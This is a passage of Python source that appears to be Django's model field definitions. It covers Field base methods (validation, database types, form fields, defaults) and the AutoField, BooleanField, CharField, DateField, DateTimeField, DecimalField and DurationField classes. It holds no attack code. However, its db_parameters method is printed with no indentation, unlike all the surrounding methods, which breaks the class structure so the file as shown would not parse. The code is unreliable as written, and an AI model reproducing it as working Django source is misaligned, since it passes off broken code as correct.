        This method provides a way to delay their creation until required.
        """
        return list(itertools.chain(self.default_validators, self._validators))
    def run_validators(self, value):
        """Run all validators on value, aggregating errors into one exception."""
        if value in self.empty_values:
            return
        errors = []
        for v in self.validators:
            try:
                v(value)
            except exceptions.ValidationError as e:
                # Prefer the field's own message for this error code, if any.
                if hasattr(e, 'code') and e.code in self.error_messages:
                    e.message = self.error_messages[e.code]
                errors.extend(e.error_list)
        if errors:
            raise exceptions.ValidationError(errors)
    def validate(self, value, model_instance):
        """
        Validates value and throws ValidationError. Subclasses should override
        this to provide validation logic.
        """
        if not self.editable:
            # Skip validation for non-editable fields.
            return
        # Choice membership is checked first, then null, then blank.
        if self.choices and value not in self.empty_values:
            for option_key, option_value in self.choices:
                if isinstance(option_value, (list, tuple)):
                    # This is an optgroup, so look inside the group for
                    # options.
                    for optgroup_key, optgroup_value in option_value:
                        if value == optgroup_key:
                            return
                elif value == option_key:
                    return
            raise exceptions.ValidationError(
                self.error_messages['invalid_choice'],
                code='invalid_choice',
                params={'value': value},
            )
        if value is None and not self.null:
            raise exceptions.ValidationError(self.error_messages['null'], code='null')
        if not self.blank and value in self.empty_values:
            raise exceptions.ValidationError(self.error_messages['blank'], code='blank')
    def clean(self, value, model_instance):
        """
        Convert the value's type and run validation. Validation errors
        from to_python and validate are propagated. The correct value is
        returned if no error is raised.
        """
        value = self.to_python(value)
        self.validate(value, model_instance)
        self.run_validators(value)
        return value
    def db_check(self, connection):
        """
        Return the database column check constraint for this field, for the
        provided connection. Works the same way as db_type() for the case that
        get_internal_type() does not map to a preexisting model field.
        """
        data = DictWrapper(self.__dict__, connection.ops.quote_name, "qn_")
        try:
            return connection.data_type_check_constraints[self.get_internal_type()] % data
        except KeyError:
            # No check constraint defined for this type on this backend.
            return None
    def db_type(self, connection):
        """
        Return the database column data type for this field, for the provided
        connection.
        """
        # The default implementation of this method looks at the
        # backend-specific data_types dictionary, looking up the field by its
        # "internal type".
        #
        # A Field class can implement the get_internal_type() method to specify
        # which *preexisting* Django Field class it's most similar to -- i.e.,
        # a custom field might be represented by a TEXT column type, which is
        # the same as the TextField Django field type, which means the custom
        # field's get_internal_type() returns 'TextField'.
        #
        # But the limitation of the get_internal_type() / data_types approach
        # is that it cannot handle database column types that aren't already
        # mapped to one of the built-in Django field types. In this case, you
        # can implement db_type() instead of get_internal_type() to specify
        # exactly which wacky database column type you want to use.
        data = DictWrapper(self.__dict__, connection.ops.quote_name, "qn_")
        try:
            return connection.data_types[self.get_internal_type()] % data
        except KeyError:
            # Unknown internal type: the subclass must override db_type().
            return None
    def rel_db_type(self, connection):
        """
        Return the data type that a related field pointing to this field should
        use. For example, this method is called by ForeignKey and OneToOneField
        to determine its data type.
        """
        return self.db_type(connection)
def db_parameters(self, connection):
"""
Extension of db_type(), providing a range of different return
values (type, checks).
This will look at db_type(), allowing custom model fields to override it.
"""
type_string = self.db_type(connection)
check_string = self.db_check(connection)
return {
"type": type_string,
"check": check_string,
}
    def db_type_suffix(self, connection):
        # Backend-specific suffix appended after the column type, if any.
        return connection.data_types_suffix.get(self.get_internal_type())
    def get_db_converters(self, connection):
        # Expose the field's from_db_value() hook as a converter, if defined.
        if hasattr(self, 'from_db_value'):
            return [self.from_db_value]
        return []
    @property
    def unique(self):
        # Primary keys are implicitly unique.
        return self._unique or self.primary_key
    def set_attributes_from_name(self, name):
        """Derive name, attname, column and verbose_name from the given name."""
        if not self.name:
            self.name = name
        self.attname, self.column = self.get_attname_column()
        self.concrete = self.column is not None
        if self.verbose_name is None and self.name:
            self.verbose_name = self.name.replace('_', ' ')
    def contribute_to_class(self, cls, name, private_only=False, virtual_only=NOT_PROVIDED):
        """
        Register the field with the model class it belongs to.
        If private_only is True, a separate instance of this field will be
        created for every subclass of cls, even if cls is not an abstract
        model.
        """
        # `virtual_only` is the deprecated spelling of `private_only`.
        if virtual_only is not NOT_PROVIDED:
            warnings.warn(
                "The `virtual_only` argument of Field.contribute_to_class() "
                "has been renamed to `private_only`.",
                RemovedInDjango20Warning, stacklevel=2
            )
            private_only = virtual_only
        self.set_attributes_from_name(name)
        self.model = cls
        if private_only:
            cls._meta.add_field(self, private=True)
        else:
            cls._meta.add_field(self)
        if self.column:
            # Don't override classmethods with the descriptor. This means that
            # if you have a classmethod and a field with the same name, then
            # such fields can't be deferred (we don't have a check for this).
            if not getattr(cls, self.attname, None):
                setattr(cls, self.attname, DeferredAttribute(self.attname, cls))
        if self.choices:
            # Install the get_FOO_display() helper for fields with choices.
            setattr(cls, 'get_%s_display' % self.name,
                    curry(cls._get_FIELD_display, field=self))
    def get_filter_kwargs_for_object(self, obj):
        """
        Return a dict that when passed as kwargs to self.model.filter(), would
        yield all instances having the same value for this field as obj has.
        """
        return {self.name: getattr(obj, self.attname)}
    def get_attname(self):
        # Attribute name on model instances (relations override this).
        return self.name
    def get_attname_column(self):
        # db_column, when set, overrides the default column name (the attname).
        attname = self.get_attname()
        column = self.db_column or attname
        return attname, column
    def get_cache_name(self):
        # Per-instance cache attribute name for this field.
        return '_%s_cache' % self.name
    def get_internal_type(self):
        # Key used to look up this field in the backend's data_types mapping.
        return self.__class__.__name__
    def pre_save(self, model_instance, add):
        """
        Returns field's value just before saving.
        """
        return getattr(model_instance, self.attname)
    def get_prep_value(self, value):
        """
        Perform preliminary non-db specific value checks and conversions.
        """
        # Resolve lazy Promise objects to their concrete value.
        if isinstance(value, Promise):
            value = value._proxy____cast()
        return value
    def get_db_prep_value(self, value, connection, prepared=False):
        """Returns field's value prepared for interacting with the database
        backend.
        Used by the default implementations of get_db_prep_save().
        """
        if not prepared:
            value = self.get_prep_value(value)
        return value
    def get_db_prep_save(self, value, connection):
        """
        Returns field's value prepared for saving into a database.
        """
        return self.get_db_prep_value(value, connection=connection,
                                      prepared=False)
    def has_default(self):
        """
        Returns a boolean of whether this field has a default value.
        """
        return self.default is not NOT_PROVIDED
    def get_default(self):
        """
        Returns the default value for this field.
        """
        return self._get_default()
    @cached_property
    def _get_default(self):
        # Returns a zero-argument callable producing the default value;
        # cached per field instance.
        if self.has_default():
            if callable(self.default):
                return self.default
            return lambda: self.default
        # Precedence note: this condition reads as
        # (not empty_strings_allowed) or (null and not interprets_empty_strings_as_nulls)
        if not self.empty_strings_allowed or self.null and not connection.features.interprets_empty_strings_as_nulls:
            return return_None
        return six.text_type  # returns empty string
    def get_choices(self, include_blank=True, blank_choice=BLANK_CHOICE_DASH, limit_choices_to=None):
        """Returns choices with a default blank choices included, for use
        as SelectField choices for this field."""
        blank_defined = False
        choices = list(self.choices) if self.choices else []
        named_groups = choices and isinstance(choices[0][1], (list, tuple))
        if not named_groups:
            # Skip the automatic blank choice if one is already declared.
            for choice, __ in choices:
                if choice in ('', None):
                    blank_defined = True
                    break
        first_choice = (blank_choice if include_blank and
                        not blank_defined else [])
        if self.choices:
            return first_choice + choices
        # No explicit choices: build them from the related model's instances.
        rel_model = self.remote_field.model
        limit_choices_to = limit_choices_to or self.get_limit_choices_to()
        if hasattr(self.remote_field, 'get_related_field'):
            lst = [(getattr(x, self.remote_field.get_related_field().attname),
                    smart_text(x))
                   for x in rel_model._default_manager.complex_filter(
                       limit_choices_to)]
        else:
            lst = [(x._get_pk_val(), smart_text(x))
                   for x in rel_model._default_manager.complex_filter(
                       limit_choices_to)]
        return first_choice + lst
    @warn_about_renamed_method(
        'Field', '_get_val_from_obj', 'value_from_object',
        RemovedInDjango20Warning
    )
    def _get_val_from_obj(self, obj):
        # Deprecated alias of value_from_object() (see decorator above).
        if obj is not None:
            return getattr(obj, self.attname)
        else:
            return self.get_default()
    def value_to_string(self, obj):
        """
        Returns a string value of this field from the passed obj.
        This is used by the serialization framework.
        """
        return force_text(self.value_from_object(obj))
    def _get_flatchoices(self):
        """Flattened version of choices tuple."""
        flat = []
        for choice, value in self.choices:
            if isinstance(value, (list, tuple)):
                # Named group: splice the group's (value, label) pairs in.
                flat.extend(value)
            else:
                flat.append((choice, value))
        return flat
    flatchoices = property(_get_flatchoices)
    def save_form_data(self, instance, data):
        # Store the cleaned form value on the instance under the field name.
        setattr(instance, self.name, data)
    def formfield(self, form_class=None, choices_form_class=None, **kwargs):
        """
        Returns a django.forms.Field instance for this database Field.
        """
        defaults = {'required': not self.blank,
                    'label': capfirst(self.verbose_name),
                    'help_text': self.help_text}
        if self.has_default():
            if callable(self.default):
                # Let the form call the default lazily and render a hidden
                # copy of the initial value for change detection.
                defaults['initial'] = self.default
                defaults['show_hidden_initial'] = True
            else:
                defaults['initial'] = self.get_default()
        if self.choices:
            # Fields with choices get special treatment.
            include_blank = (self.blank or
                             not (self.has_default() or 'initial' in kwargs))
            defaults['choices'] = self.get_choices(include_blank=include_blank)
            defaults['coerce'] = self.to_python
            if self.null:
                defaults['empty_value'] = None
            if choices_form_class is not None:
                form_class = choices_form_class
            else:
                form_class = forms.TypedChoiceField
            # Many of the subclass-specific formfield arguments (min_value,
            # max_value) don't apply for choice fields, so be sure to only pass
            # the values that TypedChoiceField will understand.
            for k in list(kwargs):
                if k not in ('coerce', 'empty_value', 'choices', 'required',
                             'widget', 'label', 'initial', 'help_text',
                             'error_messages', 'show_hidden_initial', 'disabled'):
                    del kwargs[k]
        # Caller-supplied kwargs take precedence over the computed defaults.
        defaults.update(kwargs)
        if form_class is None:
            form_class = forms.CharField
        return form_class(**defaults)
    def value_from_object(self, obj):
        """
        Returns the value of this field in the given model instance.
        """
        return getattr(obj, self.attname)
class AutoField(Field):
    """Integer primary-key field whose value the database assigns on insert."""
    description = _("Integer")
    empty_strings_allowed = False
    default_error_messages = {
        'invalid': _("'%(value)s' value must be an integer."),
    }
    def __init__(self, *args, **kwargs):
        # blank=True is forced (and removed again in deconstruct()).
        kwargs['blank'] = True
        super(AutoField, self).__init__(*args, **kwargs)
    def check(self, **kwargs):
        errors = super(AutoField, self).check(**kwargs)
        errors.extend(self._check_primary_key())
        return errors
    def _check_primary_key(self):
        # An AutoField is only valid as the model's primary key.
        if not self.primary_key:
            return [
                checks.Error(
                    'AutoFields must set primary_key=True.',
                    obj=self,
                    id='fields.E100',
                ),
            ]
        else:
            return []
    def deconstruct(self):
        name, path, args, kwargs = super(AutoField, self).deconstruct()
        # blank=True is forced in __init__ and primary_key is mandatory,
        # so neither needs to round-trip through kwargs.
        del kwargs['blank']
        kwargs['primary_key'] = True
        return name, path, args, kwargs
    def get_internal_type(self):
        return "AutoField"
    def to_python(self, value):
        """Convert value to an int, raising ValidationError if impossible."""
        if value is None:
            return value
        try:
            return int(value)
        except (TypeError, ValueError):
            raise exceptions.ValidationError(
                self.error_messages['invalid'],
                code='invalid',
                params={'value': value},
            )
    def rel_db_type(self, connection):
        # Related fields pointing at an AutoField store a plain integer.
        return IntegerField().db_type(connection=connection)
    def validate(self, value, model_instance):
        # The database assigns the value, so there is nothing to validate.
        pass
    def get_db_prep_value(self, value, connection, prepared=False):
        if not prepared:
            value = self.get_prep_value(value)
            # Give the backend a chance to reject/adjust explicit pk values.
            value = connection.ops.validate_autopk_value(value)
        return value
    def get_prep_value(self, value):
        value = super(AutoField, self).get_prep_value(value)
        if value is None:
            return None
        return int(value)
    def contribute_to_class(self, cls, name, **kwargs):
        assert not cls._meta.auto_field, "A model can't have more than one AutoField."
        super(AutoField, self).contribute_to_class(cls, name, **kwargs)
        cls._meta.auto_field = self
    def formfield(self, **kwargs):
        # Auto-assigned values are never edited through forms.
        return None
class BigAutoField(AutoField):
    """AutoField backed by an 8-byte integer column."""
    description = _("Big (8 byte) integer")
    def get_internal_type(self):
        return "BigAutoField"
    def rel_db_type(self, connection):
        # Related fields pointing at a BigAutoField store a big integer.
        return BigIntegerField().db_type(connection=connection)
class BooleanField(Field):
    """True/False field; _check_null() directs null=True users to NullBooleanField."""
    empty_strings_allowed = False
    default_error_messages = {
        'invalid': _("'%(value)s' value must be either True or False."),
    }
    description = _("Boolean (Either True or False)")
    def __init__(self, *args, **kwargs):
        # blank=True is forced (and removed again in deconstruct()).
        kwargs['blank'] = True
        super(BooleanField, self).__init__(*args, **kwargs)
    def check(self, **kwargs):
        errors = super(BooleanField, self).check(**kwargs)
        errors.extend(self._check_null(**kwargs))
        return errors
    def _check_null(self, **kwargs):
        # null=True is rejected here; NullBooleanField exists for that case.
        if getattr(self, 'null', False):
            return [
                checks.Error(
                    'BooleanFields do not accept null values.',
                    hint='Use a NullBooleanField instead.',
                    obj=self,
                    id='fields.E110',
                )
            ]
        else:
            return []
    def deconstruct(self):
        name, path, args, kwargs = super(BooleanField, self).deconstruct()
        # blank=True is forced in __init__, so it need not round-trip.
        del kwargs['blank']
        return name, path, args, kwargs
    def get_internal_type(self):
        return "BooleanField"
    def to_python(self, value):
        """Convert value to a bool, raising ValidationError if impossible."""
        if value in (True, False):
            # if value is 1 or 0 than it's equal to True or False, but we want
            # to return a true bool for semantic reasons.
            return bool(value)
        if value in ('t', 'True', '1'):
            return True
        if value in ('f', 'False', '0'):
            return False
        raise exceptions.ValidationError(
            self.error_messages['invalid'],
            code='invalid',
            params={'value': value},
        )
    def get_prep_value(self, value):
        value = super(BooleanField, self).get_prep_value(value)
        if value is None:
            return None
        return self.to_python(value)
    def formfield(self, **kwargs):
        # Unlike most fields, BooleanField figures out include_blank from
        # self.null instead of self.blank.
        if self.choices:
            include_blank = not (self.has_default() or 'initial' in kwargs)
            defaults = {'choices': self.get_choices(include_blank=include_blank)}
        else:
            defaults = {'form_class': forms.BooleanField}
        defaults.update(kwargs)
        return super(BooleanField, self).formfield(**defaults)
class CharField(Field):
    """String field with a mandatory max_length (enforced by a validator)."""
    description = _("String (up to %(max_length)s)")
    def __init__(self, *args, **kwargs):
        super(CharField, self).__init__(*args, **kwargs)
        # Enforce max_length at validation time as well as at the db level.
        self.validators.append(validators.MaxLengthValidator(self.max_length))
    def check(self, **kwargs):
        errors = super(CharField, self).check(**kwargs)
        errors.extend(self._check_max_length_attribute(**kwargs))
        return errors
    def _check_max_length_attribute(self, **kwargs):
        # max_length is mandatory and must be a positive integer.
        if self.max_length is None:
            return [
                checks.Error(
                    "CharFields must define a 'max_length' attribute.",
                    obj=self,
                    id='fields.E120',
                )
            ]
        elif not isinstance(self.max_length, six.integer_types) or self.max_length <= 0:
            return [
                checks.Error(
                    "'max_length' must be a positive integer.",
                    obj=self,
                    id='fields.E121',
                )
            ]
        else:
            return []
    def get_internal_type(self):
        return "CharField"
    def to_python(self, value):
        # Strings (and None) pass through; everything else is coerced to text.
        if isinstance(value, six.string_types) or value is None:
            return value
        return force_text(value)
    def get_prep_value(self, value):
        value = super(CharField, self).get_prep_value(value)
        return self.to_python(value)
    def formfield(self, **kwargs):
        # Passing max_length to forms.CharField means that the value's length
        # will be validated twice. This is considered acceptable since we want
        # the value in the form field (to pass into widget for example).
        defaults = {'max_length': self.max_length}
        # TODO: Handle multiple backends with different feature flags.
        if self.null and not connection.features.interprets_empty_strings_as_nulls:
            defaults['empty_value'] = None
        defaults.update(kwargs)
        return super(CharField, self).formfield(**defaults)
class CommaSeparatedIntegerField(CharField):
    """Deprecated CharField variant validating comma-separated integer lists."""
    default_validators = [validators.validate_comma_separated_integer_list]
    description = _("Comma-separated integers")
    # Surfaced by Field._check_deprecation_details() as check fields.W901.
    system_check_deprecated_details = {
        'msg': (
            'CommaSeparatedIntegerField has been deprecated. Support '
            'for it (except in historical migrations) will be removed '
            'in Django 2.0.'
        ),
        'hint': (
            'Use CharField(validators=[validate_comma_separated_integer_list]) instead.'
        ),
        'id': 'fields.W901',
    }
    def formfield(self, **kwargs):
        defaults = {
            'error_messages': {
                'invalid': _('Enter only digits separated by commas.'),
            }
        }
        defaults.update(kwargs)
        return super(CommaSeparatedIntegerField, self).formfield(**defaults)
class DateTimeCheckMixin(object):
    """Mixin adding system checks shared by date/time fields."""
    def check(self, **kwargs):
        errors = super(DateTimeCheckMixin, self).check(**kwargs)
        for extra_errors in (self._check_mutually_exclusive_options(),
                             self._check_fix_default_value()):
            errors.extend(extra_errors)
        return errors
    def _check_mutually_exclusive_options(self):
        # auto_now, auto_now_add, and default are mutually exclusive
        # options; using more than one together triggers an Error.
        options = (self.auto_now_add, self.auto_now, self.has_default())
        enabled = sum(1 for option in options if option not in (None, False))
        if enabled <= 1:
            return []
        return [
            checks.Error(
                "The options auto_now, auto_now_add, and default "
                "are mutually exclusive. Only one of these options "
                "may be present.",
                obj=self,
                id='fields.E160',
            )
        ]
    def _check_fix_default_value(self):
        # Hook overridden by concrete date/time fields; no generic check here.
        return []
class DateField(DateTimeCheckMixin, Field):
    """Date (without time) field, mapping to datetime.date."""
    empty_strings_allowed = False
    default_error_messages = {
        'invalid': _("'%(value)s' value has an invalid date format. It must be "
                     "in YYYY-MM-DD format."),
        'invalid_date': _("'%(value)s' value has the correct format (YYYY-MM-DD) "
                          "but it is an invalid date."),
    }
    description = _("Date (without time)")
    def __init__(self, verbose_name=None, name=None, auto_now=False,
                 auto_now_add=False, **kwargs):
        self.auto_now, self.auto_now_add = auto_now, auto_now_add
        if auto_now or auto_now_add:
            # Auto-populated fields are not editable and may be left blank.
            kwargs['editable'] = False
            kwargs['blank'] = True
        super(DateField, self).__init__(verbose_name, name, **kwargs)
    def _check_fix_default_value(self):
        """
        Adds a warning to the checks framework stating, that using an actual
        date or datetime value is probably wrong; it's only being evaluated on
        server start-up.
        For details see ticket #21905
        """
        if not self.has_default():
            return []
        now = timezone.now()
        if not timezone.is_naive(now):
            now = timezone.make_naive(now, timezone.utc)
        value = self.default
        if isinstance(value, datetime.datetime):
            if not timezone.is_naive(value):
                value = timezone.make_naive(value, timezone.utc)
            value = value.date()
        elif isinstance(value, datetime.date):
            # Nothing to do, as dates don't have tz information
            pass
        else:
            # No explicit date / datetime value -- no checks necessary
            return []
        # Only warn when the default lies within a day of "now" -- that
        # pattern suggests the author wanted "today" evaluated at runtime.
        offset = datetime.timedelta(days=1)
        lower = (now - offset).date()
        upper = (now + offset).date()
        if lower <= value <= upper:
            return [
                checks.Warning(
                    'Fixed default value provided.',
                    hint='It seems you set a fixed date / time / datetime '
                         'value as default for this field. This may not be '
                         'what you want. If you want to have the current date '
                         'as default, use `django.utils.timezone.now`',
                    obj=self,
                    id='fields.W161',
                )
            ]
        return []
    def deconstruct(self):
        name, path, args, kwargs = super(DateField, self).deconstruct()
        if self.auto_now:
            kwargs['auto_now'] = True
        if self.auto_now_add:
            kwargs['auto_now_add'] = True
        if self.auto_now or self.auto_now_add:
            # editable/blank were forced in __init__; don't round-trip them.
            del kwargs['editable']
            del kwargs['blank']
        return name, path, args, kwargs
    def get_internal_type(self):
        return "DateField"
    def to_python(self, value):
        """Convert value to a datetime.date, raising ValidationError on failure."""
        if value is None:
            return value
        if isinstance(value, datetime.datetime):
            if settings.USE_TZ and timezone.is_aware(value):
                # Convert aware datetimes to the default time zone
                # before casting them to dates (#17742).
                default_timezone = timezone.get_default_timezone()
                value = timezone.make_naive(value, default_timezone)
            return value.date()
        if isinstance(value, datetime.date):
            return value
        try:
            parsed = parse_date(value)
            if parsed is not None:
                return parsed
        except ValueError:
            # Well-formed string but an impossible calendar date.
            raise exceptions.ValidationError(
                self.error_messages['invalid_date'],
                code='invalid_date',
                params={'value': value},
            )
        raise exceptions.ValidationError(
            self.error_messages['invalid'],
            code='invalid',
            params={'value': value},
        )
    def pre_save(self, model_instance, add):
        if self.auto_now or (self.auto_now_add and add):
            # Auto-populate with today's date and store it on the instance.
            value = datetime.date.today()
            setattr(model_instance, self.attname, value)
            return value
        else:
            return super(DateField, self).pre_save(model_instance, add)
    def contribute_to_class(self, cls, name, **kwargs):
        super(DateField, self).contribute_to_class(cls, name, **kwargs)
        if not self.null:
            # Install get_next_by_FOO() / get_previous_by_FOO() helpers.
            setattr(
                cls, 'get_next_by_%s' % self.name,
                curry(cls._get_next_or_previous_by_FIELD, field=self, is_next=True)
            )
            setattr(
                cls, 'get_previous_by_%s' % self.name,
                curry(cls._get_next_or_previous_by_FIELD, field=self, is_next=False)
            )
    def get_prep_value(self, value):
        value = super(DateField, self).get_prep_value(value)
        return self.to_python(value)
    def get_db_prep_value(self, value, connection, prepared=False):
        # Casts dates into the format expected by the backend
        if not prepared:
            value = self.get_prep_value(value)
        return connection.ops.adapt_datefield_value(value)
    def value_to_string(self, obj):
        # Serialize as ISO 8601 (YYYY-MM-DD); empty string for None.
        val = self.value_from_object(obj)
        return '' if val is None else val.isoformat()
    def formfield(self, **kwargs):
        defaults = {'form_class': forms.DateField}
        defaults.update(kwargs)
        return super(DateField, self).formfield(**defaults)
class DateTimeField(DateField):
    """Model field storing a date plus time; maps to ``datetime.datetime``."""
    empty_strings_allowed = False
    default_error_messages = {
        'invalid': _("'%(value)s' value has an invalid format. It must be in "
                     "YYYY-MM-DD HH:MM[:ss[.uuuuuu]][TZ] format."),
        'invalid_date': _("'%(value)s' value has the correct format "
                          "(YYYY-MM-DD) but it is an invalid date."),
        'invalid_datetime': _("'%(value)s' value has the correct format "
                              "(YYYY-MM-DD HH:MM[:ss[.uuuuuu]][TZ]) "
                              "but it is an invalid date/time."),
    }
    description = _("Date (with time)")

    # __init__ is inherited from DateField

    def _check_fix_default_value(self):
        """
        Adds a warning to the checks framework stating, that using an actual
        date or datetime value is probably wrong; it's only being evaluated on
        server start-up.

        For details see ticket #21905
        """
        if not self.has_default():
            return []
        # Compare in naive UTC so aware and naive defaults are comparable.
        now = timezone.now()
        if not timezone.is_naive(now):
            now = timezone.make_naive(now, timezone.utc)
        value = self.default
        if isinstance(value, datetime.datetime):
            # Datetime default: flag it if it falls within +/-10s of "now".
            second_offset = datetime.timedelta(seconds=10)
            lower = now - second_offset
            upper = now + second_offset
            if timezone.is_aware(value):
                value = timezone.make_naive(value, timezone.utc)
        elif isinstance(value, datetime.date):
            # Date default: widen the window to whole-day boundaries.
            second_offset = datetime.timedelta(seconds=10)
            lower = now - second_offset
            lower = datetime.datetime(lower.year, lower.month, lower.day)
            upper = now + second_offset
            upper = datetime.datetime(upper.year, upper.month, upper.day)
            value = datetime.datetime(value.year, value.month, value.day)
        else:
            # No explicit date / datetime value -- no checks necessary
            return []
        if lower <= value <= upper:
            return [
                checks.Warning(
                    'Fixed default value provided.',
                    hint='It seems you set a fixed date / time / datetime '
                         'value as default for this field. This may not be '
                         'what you want. If you want to have the current date '
                         'as default, use `django.utils.timezone.now`',
                    obj=self,
                    id='fields.W161',
                )
            ]
        return []

    def get_internal_type(self):
        return "DateTimeField"

    def to_python(self, value):
        """Convert *value* to an (aware, when USE_TZ) ``datetime.datetime``.

        Accepts datetimes, dates (midnight is assumed) and ISO-like strings;
        raises ValidationError for anything unparsable.
        """
        if value is None:
            return value
        if isinstance(value, datetime.datetime):
            return value
        if isinstance(value, datetime.date):
            value = datetime.datetime(value.year, value.month, value.day)
            if settings.USE_TZ:
                # For backwards compatibility, interpret naive datetimes in
                # local time. This won't work during DST change, but we can't
                # do much about it, so we let the exceptions percolate up the
                # call stack.
                warnings.warn("DateTimeField %s.%s received a naive datetime "
                              "(%s) while time zone support is active." %
                              (self.model.__name__, self.name, value),
                              RuntimeWarning)
                default_timezone = timezone.get_default_timezone()
                value = timezone.make_aware(value, default_timezone)
            return value
        # Try the full datetime format first, then fall back to date-only.
        try:
            parsed = parse_datetime(value)
            if parsed is not None:
                return parsed
        except ValueError:
            raise exceptions.ValidationError(
                self.error_messages['invalid_datetime'],
                code='invalid_datetime',
                params={'value': value},
            )
        try:
            parsed = parse_date(value)
            if parsed is not None:
                return datetime.datetime(parsed.year, parsed.month, parsed.day)
        except ValueError:
            raise exceptions.ValidationError(
                self.error_messages['invalid_date'],
                code='invalid_date',
                params={'value': value},
            )
        raise exceptions.ValidationError(
            self.error_messages['invalid'],
            code='invalid',
            params={'value': value},
        )

    def pre_save(self, model_instance, add):
        # auto_now / auto_now_add stamp the instance with the current time.
        if self.auto_now or (self.auto_now_add and add):
            value = timezone.now()
            setattr(model_instance, self.attname, value)
            return value
        else:
            return super(DateTimeField, self).pre_save(model_instance, add)

    # contribute_to_class is inherited from DateField, it registers
    # get_next_by_FOO and get_prev_by_FOO

    def get_prep_value(self, value):
        """Normalize to a datetime, making naive values aware under USE_TZ."""
        value = super(DateTimeField, self).get_prep_value(value)
        value = self.to_python(value)
        if value is not None and settings.USE_TZ and timezone.is_naive(value):
            # For backwards compatibility, interpret naive datetimes in local
            # time. This won't work during DST change, but we can't do much
            # about it, so we let the exceptions percolate up the call stack.
            try:
                name = '%s.%s' % (self.model.__name__, self.name)
            except AttributeError:
                # Field may not be attached to a model yet.
                name = '(unbound)'
            warnings.warn("DateTimeField %s received a naive datetime (%s)"
                          " while time zone support is active." %
                          (name, value),
                          RuntimeWarning)
            default_timezone = timezone.get_default_timezone()
            value = timezone.make_aware(value, default_timezone)
        return value

    def get_db_prep_value(self, value, connection, prepared=False):
        # Casts datetimes into the format expected by the backend
        if not prepared:
            value = self.get_prep_value(value)
        return connection.ops.adapt_datetimefield_value(value)

    def value_to_string(self, obj):
        # Serialization hook: ISO 8601 string, or '' for NULL.
        val = self.value_from_object(obj)
        return '' if val is None else val.isoformat()

    def formfield(self, **kwargs):
        defaults = {'form_class': forms.DateTimeField}
        defaults.update(kwargs)
        return super(DateTimeField, self).formfield(**defaults)
class DecimalField(Field):
    """Fixed-precision decimal number, mapped to ``decimal.Decimal``."""
    empty_strings_allowed = False
    default_error_messages = {
        'invalid': _("'%(value)s' value must be a decimal number."),
    }
    description = _("Decimal number")

    def __init__(self, verbose_name=None, name=None, max_digits=None,
                 decimal_places=None, **kwargs):
        # max_digits: total number of digits; decimal_places: digits after
        # the decimal point. Both are validated by check() below.
        self.max_digits, self.decimal_places = max_digits, decimal_places
        super(DecimalField, self).__init__(verbose_name, name, **kwargs)

    def check(self, **kwargs):
        """Validate the two digit options individually, then as a pair."""
        errors = super(DecimalField, self).check(**kwargs)
        digits_errors = self._check_decimal_places()
        digits_errors.extend(self._check_max_digits())
        if not digits_errors:
            # Only compare the options once both are individually valid.
            errors.extend(self._check_decimal_places_and_max_digits(**kwargs))
        else:
            errors.extend(digits_errors)
        return errors

    def _check_decimal_places(self):
        # decimal_places must be present (TypeError) and a non-negative
        # integer (ValueError).
        try:
            decimal_places = int(self.decimal_places)
            if decimal_places < 0:
                raise ValueError()
        except TypeError:
            return [
                checks.Error(
                    "DecimalFields must define a 'decimal_places' attribute.",
                    obj=self,
                    id='fields.E130',
                )
            ]
        except ValueError:
            return [
                checks.Error(
                    "'decimal_places' must be a non-negative integer.",
                    obj=self,
                    id='fields.E131',
                )
            ]
        else:
            return []

    def _check_max_digits(self):
        # max_digits must be present (TypeError) and a positive integer
        # (ValueError).
        try:
            max_digits = int(self.max_digits)
            if max_digits <= 0:
                raise ValueError()
        except TypeError:
            return [
                checks.Error(
                    "DecimalFields must define a 'max_digits' attribute.",
                    obj=self,
                    id='fields.E132',
                )
            ]
        except ValueError:
            return [
                checks.Error(
                    "'max_digits' must be a positive integer.",
                    obj=self,
                    id='fields.E133',
                )
            ]
        else:
            return []

    def _check_decimal_places_and_max_digits(self, **kwargs):
        # A number cannot have more fractional digits than total digits.
        if int(self.decimal_places) > int(self.max_digits):
            return [
                checks.Error(
                    "'max_digits' must be greater or equal to 'decimal_places'.",
                    obj=self,
                    id='fields.E134',
                )
            ]
        return []

    @cached_property
    def validators(self):
        # Add a DecimalValidator enforcing the digit limits on top of the
        # base field validators.
        return super(DecimalField, self).validators + [
            validators.DecimalValidator(self.max_digits, self.decimal_places)
        ]

    def deconstruct(self):
        name, path, args, kwargs = super(DecimalField, self).deconstruct()
        if self.max_digits is not None:
            kwargs['max_digits'] = self.max_digits
        if self.decimal_places is not None:
            kwargs['decimal_places'] = self.decimal_places
        return name, path, args, kwargs

    def get_internal_type(self):
        return "DecimalField"

    def to_python(self, value):
        """Convert *value* to Decimal or raise ValidationError."""
        if value is None:
            return value
        try:
            return decimal.Decimal(value)
        except decimal.InvalidOperation:
            raise exceptions.ValidationError(
                self.error_messages['invalid'],
                code='invalid',
                params={'value': value},
            )

    def _format(self, value):
        # Strings pass through untouched; numbers are rendered with the
        # configured precision.
        if isinstance(value, six.string_types):
            return value
        else:
            return self.format_number(value)

    def format_number(self, value):
        """
        Formats a number into a string with the requisite number of digits and
        decimal places.
        """
        # Method moved to django.db.backends.utils.
        #
        # It is preserved because it is used by the oracle backend
        # (django.db.backends.oracle.query), and also for
        # backwards-compatibility with any external code which may have used
        # this method.
        from django.db.backends import utils
        return utils.format_number(value, self.max_digits, self.decimal_places)

    def get_db_prep_save(self, value, connection):
        # Let the backend adapt the Decimal to its storage representation.
        return connection.ops.adapt_decimalfield_value(self.to_python(value), self.max_digits, self.decimal_places)

    def get_prep_value(self, value):
        value = super(DecimalField, self).get_prep_value(value)
        return self.to_python(value)

    def formfield(self, **kwargs):
        defaults = {
            'max_digits': self.max_digits,
            'decimal_places': self.decimal_places,
            'form_class': forms.DecimalField,
        }
        defaults.update(kwargs)
        return super(DecimalField, self).formfield(**defaults)
class DurationField(Field):
    """Stores timedelta objects.

    Uses interval on PostgreSQL, INTERVAL DAY TO SECOND on Oracle, and bigint
    of microseconds on other databases.
    """
    empty_strings_allowed = False
    default_error_messages = {
        'invalid': _("'%(value)s' value has an invalid format. It must be in "
                     "[DD] [HH:[MM:]]ss[.uuuuuu] format.")
    }
    description = _("Duration")

    def get_internal_type(self):
        return "DurationField"

    def to_python(self, value):
        """Convert *value* to a ``datetime.timedelta`` or raise ValidationError."""
        if value is None:
            return value
        if isinstance(value, datetime.timedelta):
            return value
        try:
            parsed = parse_duration(value)
        except ValueError:
            # Fall through to the ValidationError below.
            pass
        else:
            if parsed is not None:
                return parsed
        raise exceptions.ValidationError(
            self.error_messages['invalid'],
            code='invalid',
            params={'value': value},
